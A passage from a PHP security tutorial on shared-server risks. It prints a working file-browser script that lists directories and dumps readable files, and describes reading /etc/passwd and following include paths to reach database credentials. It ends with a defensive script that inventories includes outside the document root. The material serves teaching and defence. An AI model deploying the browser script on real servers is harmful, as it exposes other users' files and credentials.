In addition to being able to read arbitrary files on the shared server, the attacker can also create a script that can browse the file system. Since most of your sensitive files will not be stored in the main directory of your website, this type of script is generally used to find the location of your source files. Please see the following example:
<pre class="brush:php;toolbar:false">
<?php

if (isset($_GET['dir'])) {
    ls($_GET['dir']);
} elseif (isset($_GET['file'])) {
    cat($_GET['file']);
} else {
    ls('/');
}

// Print a file's contents, HTML-escaped.
function cat($file)
{
    echo htmlentities(file_get_contents($file), ENT_QUOTES, 'UTF-8');
}

// List a directory, linking each readable entry back to this script.
function ls($dir)
{
    $handle = dir($dir);

    while ($filename = $handle->read()) {
        $size = filesize("$dir$filename");

        if (is_dir("$dir$filename")) {
            $type = 'dir';
            $filename .= '/';
        } else {
            $type = 'file';
        }

        if (is_readable("$dir$filename")) {
            $line = str_pad($size, 15);
            $line .= "<a href=\"{$_SERVER['PHP_SELF']}";
            $line .= "?$type=$dir$filename\">$filename</a>";
        } else {
            $line = str_pad($size, 15);
            $line .= $filename;
        }

        echo "$line\n";
    }

    $handle->close();
}

?>
</pre>
An attacker may first look at the /etc/passwd file or the /home directory to obtain a list of usernames on the server. The location of source files stored outside the website's home directory can then be discovered through language constructs such as include or require. For example, consider the following script file, /home/victim/public_html/admin.php:
<pre class="brush:php;toolbar:false">
<?php

include '../inc/db.inc';

/* ... */

?>
</pre>
If an attacker manages to display the source code of this file, he can discover the location of db.inc and use the readfile() function to expose its contents and gain access to the database. Thus, saving db.inc outside the website's home directory does not protect it in this environment.
This attack illustrates why all source files on a shared server should be considered public, and why the database should be chosen to hold all sensitive data.
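Since every file your scripts name has to be treated as public in this environment, the added example below (not code from the original page) inventories your own site: it lists the literal include/require targets that resolve outside the document root, such as db.inc above. The function names are hypothetical, and it assumes PHP 7.4+ and that relative paths resolve against the including script's directory.

```php
<?php
// Return the literal include/require paths found in one PHP source string.
function literal_includes(string $source): array
{
    $kinds = [T_INCLUDE, T_INCLUDE_ONCE, T_REQUIRE, T_REQUIRE_ONCE];
    // Drop whitespace and comments so the argument directly follows the keyword.
    $tokens = array_values(array_filter(token_get_all($source), fn($t) =>
        !is_array($t) || !in_array($t[0], [T_WHITESPACE, T_COMMENT, T_DOC_COMMENT], true)));
    $paths = [];
    foreach ($tokens as $i => $t) {
        $j = ($tokens[$i + 1] ?? null) === '(' ? $i + 2 : $i + 1;
        $arg = $tokens[$j] ?? null;
        // Keyword followed by a lone quoted string; computed paths are skipped.
        if (is_array($t) && in_array($t[0], $kinds, true)
            && is_array($arg) && $arg[0] === T_CONSTANT_ENCAPSED_STRING
            && in_array($tokens[$j + 1] ?? null, [';', ')'], true)) {
            $paths[] = substr($arg[1], 1, -1); // strip the surrounding quotes
        }
    }
    return $paths;
}

// Map each include target outside $docroot to the scripts that name it.
function includes_outside_docroot(string $docroot): array
{
    if (($root = realpath($docroot)) === false) {
        throw new InvalidArgumentException("No such directory: $docroot");
    }
    $root = rtrim($root, '/') . '/';
    $found = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
    foreach ($files as $file) {
        if (!$file->isFile() || !$file->isReadable() || $file->getExtension() !== 'php') {
            continue;
        }
        foreach (literal_includes(file_get_contents($file->getPathname())) as $path) {
            // Assumption: relative paths resolve against the including script's directory.
            $real = realpath(strncmp($path, '/', 1) === 0 ? $path : $file->getPath() . "/$path");
            if ($real !== false && strpos($real, $root) !== 0) {
                $found[$real][] = $file->getPathname();
            }
        }
    }
    return $found;
}

foreach (includes_outside_docroot($argv[1] ?? '.') as $target => $sources) {
    echo $target, ' <- ', implode(', ', array_unique($sources)), "\n";
}
```

Run it from the command line with your own document root as the argument; each file it prints is one whose location your source code discloses, so check that it holds no sensitive data.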